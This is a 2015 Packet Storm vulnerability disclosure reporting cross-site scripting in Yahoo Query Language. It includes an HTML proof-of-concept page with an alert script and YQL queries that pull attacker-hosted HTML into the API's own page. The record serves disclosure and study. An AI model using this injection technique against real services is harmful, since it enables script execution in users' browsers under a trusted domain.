Yahoo Query Language Cross Site Scripting

2015-03-08T00:00:00
ID PACKETSTORM:130718
Type packetstorm
Reporter C4T
Modified 2015-03-08T00:00:00

Description

                                        
                                            `/***********************************************************************************  
** Exploit Title: Yahoo Query Language Cross Site Scripting   
Vulnerability  
**  
** Exploit Author: Peyman D. aka C4T  
**  
** Vendor Homepage : http://query.yahooapis.com/  
**  
** Google Dork: none  
**  
** Date: 2015-03-08  
**  
** Tested on: Windows 7 / Mozila Firefox  
**  
************************************************************************************  
** Exploit Code:  
******************  
  
<html xmlns="http://www.w3.org/1999/xhtml">  
<body>  
<span>Discovered by Peyman D.</span>  
<span>aka C4T</span>  
<script>  
alert('Successfully Exploited');  
</script>  
</body>  
</html>  
  
************************************************************************************  
Location & Vulnerable query:  
******************  
  
http://query.yahooapis.com/v1/public/yql?q= select * from html where   
url='[attacker-website.com]/exploit.html' and xpath='html'  
  
*************************************************************************************  
** Proof:  
******************  
  
Executable script tag in API's own page:  
  
Malicious source: http://hatrhyme.com/alert.html  
Exploit query:  
http://query.yahooapis.com/v1/public/yql?q= select * from html where   
url='http://hatrhyme.com/alert.html' and xpath='html'  
  
-------------------------------------------------------  
  
Injecting HTML tags in API's own page:  
  
Malicious source: http://hatrhyme.com/expl.html  
Exploit query:  
http://query.yahooapis.com/v1/public/yql?q= select * from html where   
url='http://hatrhyme.com/expl.html' and xpath='html'  
  
-------------------------------------------------------  
******************************************************************************************  
**  
** Explanation and the cause of this vulnerability:  
**  
** http://hatrhyme.com/XSSInYQL.pdf  
**  
******************************************************************************************  
`